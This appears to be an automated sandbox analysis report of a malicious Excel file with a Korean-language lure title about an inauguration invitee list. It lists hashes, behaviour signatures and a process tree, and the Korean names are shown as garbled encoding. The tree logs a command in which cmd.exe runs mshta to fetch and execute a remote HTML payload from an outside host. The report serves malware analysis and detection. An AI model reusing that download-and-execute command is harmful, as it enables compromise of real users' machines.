Analysis

max time kernel: 147s
max time network: 152s
platform: windows10-2004_x64
resource: win10v2004-20230220-en
resource tags: arch:x64, arch:x86, image:win10v2004-20230220-en, locale:en-us, os:windows10-2004-x64, system
submitted: 21-03-2023 23:17
Behavioral tasks

behavioral1: sample "(20220120)2022 - 001.chm", resource win7-20230220-en
behavioral2: sample "(20220120)2022 - 001.chm", resource win10v2004-20230220-en
behavioral3: sample "(μμ) μ 20λ λν΅λ Ή μ·¨μμ μ¬μΈλν¬ μ°Έμμ μΆμ² λͺ λ¨(κ΅λ―ΌμνλΉμ 000).chm", resource win7-20230220-en
behavioral4: sample "(μμ) μ 20λ λν΅λ Ή μ·¨μμ μ¬μΈλν¬ μ°Έμμ μΆμ² λͺ λ¨(κ΅λ―ΌμνλΉμ 000).chm", resource win10v2004-20230221-en
behavioral5: sample "(μμ) μ 20λ λν΅λ Ή μ·¨μμ μ¬μΈλν¬ μ°Έμμ μΆμ² λͺ λ¨(κ΅λ―ΌμνλΉμ 000).xls", resource win7-20230220-en
behavioral6: sample "(μμ) μ 20λ λν΅λ Ή μ·¨μμ μ¬μΈλν¬ μ°Έμμ μΆμ² λͺ λ¨(κ΅λ―ΌμνλΉμ 000).xls", resource win10v2004-20230220-en
General

Target: (μμ) μ 20λ λν΅λ Ή μ·¨μμ μ¬μΈλν¬ μ°Έμμ μΆμ² λͺ λ¨(κ΅λ―ΌμνλΉμ 000).xls
Size: 135KB
MD5: c8df23e698e196f803ace0f50a18944d
SHA1: bf47a34bc092fa81918a387e8f5282f7a7d8a0c4
SHA256: db70f269d62c43bd09580858731853a589e0f32f2d3c915b15cb9f0b4b9f12d2
SHA512: 29146eff3ed7d8b6ddbf1736f2e2a2fb90a0cec1fc9f8244763802ef9af36bbf1fdd907eee198fe8d910cd3ae17227ab2d2b9e376d9243bdc549d602182f6ab3
SSDEEP: 3072:Fk3hOdsylKlgryzc4bNhZFGzE+cL2knAeQN3QgBzMnNXHM6au7Fei9Yyg4/FQbux:Fk3hOdsylKlgryzc4bNhZF+E+W2knAeX
Malware Config

Extracted URL: http://attiferstudio.com/install.bak/sony/6.html
Signatures

Process spawned unexpected child process (2 IoCs)
This typically indicates the parent process was compromised via an exploit or macro.
Processes: cmd.exe, WerFault.exe
  description | pid | pid_target | process | target process
  Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | 2816 | 1116 | cmd.exe | EXCEL.EXE
  Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | 2108 | 1116 | WerFault.exe | EXCEL.EXE

Blocklisted process makes network request (1 IoC)
Processes: mshta.exe
  flow | pid | process
  30 | 4616 | mshta.exe

Process spawned suspicious child process (1 IoC)
This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.
Processes: DW20.EXE
  description | pid | pid_target | process | target process
  Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | 1020 | 1116 | DW20.EXE | EXCEL.EXE

Program crash (1 IoC)
Processes: WerFault.exe
  pid | pid_target | process | target process
  2108 | 1116 | WerFault.exe | EXCEL.EXE

Checks processor information in registry (2 TTPs, 6 IoCs)
Processor information is often read in order to detect sandboxing environments.
Processes: dwwin.exe, EXCEL.EXE
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | dwwin.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | dwwin.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | dwwin.exe
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | EXCEL.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | EXCEL.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | EXCEL.EXE

Enumerates system info in registry (2 TTPs, 5 IoCs)
Processes: EXCEL.EXE, dwwin.exe
  description | ioc | process
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | EXCEL.EXE
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | dwwin.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | dwwin.exe
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | EXCEL.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener (1 IoC)
Processes: EXCEL.EXE
  pid | process
  1116 | EXCEL.EXE

Suspicious behavior: EnumeratesProcesses (4 IoCs)
Processes: EXCEL.EXE
  pid | process
  1116 | EXCEL.EXE (4 occurrences)

Suspicious use of FindShellTrayWindow (2 IoCs)
Processes: EXCEL.EXE
  pid | process
  1116 | EXCEL.EXE (2 occurrences)

Suspicious use of SetWindowsHookEx (12 IoCs)
Processes: EXCEL.EXE
  pid | process
  1116 | EXCEL.EXE (12 occurrences)

Suspicious use of WriteProcessMemory (8 IoCs)
Processes: EXCEL.EXE, cmd.exe, DW20.EXE
  description | pid | process | target process
  PID 1116 wrote to memory of 2816 | 1116 | EXCEL.EXE | cmd.exe (2 occurrences)
  PID 2816 wrote to memory of 4616 | 2816 | cmd.exe | mshta.exe (2 occurrences)
  PID 1116 wrote to memory of 1020 | 1116 | EXCEL.EXE | DW20.EXE (2 occurrences)
  PID 1020 wrote to memory of 3240 | 1020 | DW20.EXE | dwwin.exe (2 occurrences)
Processes (tree; indentation shows parent/child depth)

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
  command line: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\(μμ) μ 20λ λν΅λ Ή μ·¨μμ μ¬μΈλν¬ μ°Έμμ μΆμ² λͺ λ¨(κ΅λ―ΌμνλΉμ 000).xls"
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory

    C:\Windows\System32\cmd.exe
      command line: "C:\Windows\System32\cmd.exe" /c mshta http://attiferstudio.com/install.bak/sony/6.html
      - Process spawned unexpected child process
      - Suspicious use of WriteProcessMemory

        C:\Windows\system32\mshta.exe
          command line: mshta http://attiferstudio.com/install.bak/sony/6.html
          - Blocklisted process makes network request

    C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DW20.EXE
      command line: "C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DW20.EXE" -x -s 4444
      - Process spawned suspicious child process
      - Suspicious use of WriteProcessMemory

        C:\Windows\system32\dwwin.exe
          command line: C:\Windows\system32\dwwin.exe -x -s 4444
          - Checks processor information in registry
          - Enumerates system info in registry

    C:\Windows\system32\WerFault.exe
      command line: C:\Windows\system32\WerFault.exe -u -p 1116 -s 4568
      - Process spawned unexpected child process
      - Program crash

C:\Windows\system32\WerFault.exe
  command line: C:\Windows\system32\WerFault.exe -pss -s 464 -p 1116 -ip 1116
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads (memory dumps)

  dump | filesize
  memory/1020-165-0x00007FF8912D0000-0x00007FF8912E0000-memory.dmp | 64KB
  memory/1020-166-0x00007FF8912D0000-0x00007FF8912E0000-memory.dmp | 64KB
  memory/1020-167-0x00007FF8912D0000-0x00007FF8912E0000-memory.dmp | 64KB
  memory/1020-168-0x00007FF8912D0000-0x00007FF8912E0000-memory.dmp | 64KB
  memory/1116-133-0x00007FF8912D0000-0x00007FF8912E0000-memory.dmp | 64KB
  memory/1116-135-0x00007FF8912D0000-0x00007FF8912E0000-memory.dmp | 64KB
  memory/1116-134-0x00007FF8912D0000-0x00007FF8912E0000-memory.dmp | 64KB
  memory/1116-136-0x00007FF8912D0000-0x00007FF8912E0000-memory.dmp | 64KB
  memory/1116-137-0x00007FF8912D0000-0x00007FF8912E0000-memory.dmp | 64KB
  memory/1116-138-0x00007FF88EC90000-0x00007FF88ECA0000-memory.dmp | 64KB
  memory/1116-139-0x00007FF88EC90000-0x00007FF88ECA0000-memory.dmp | 64KB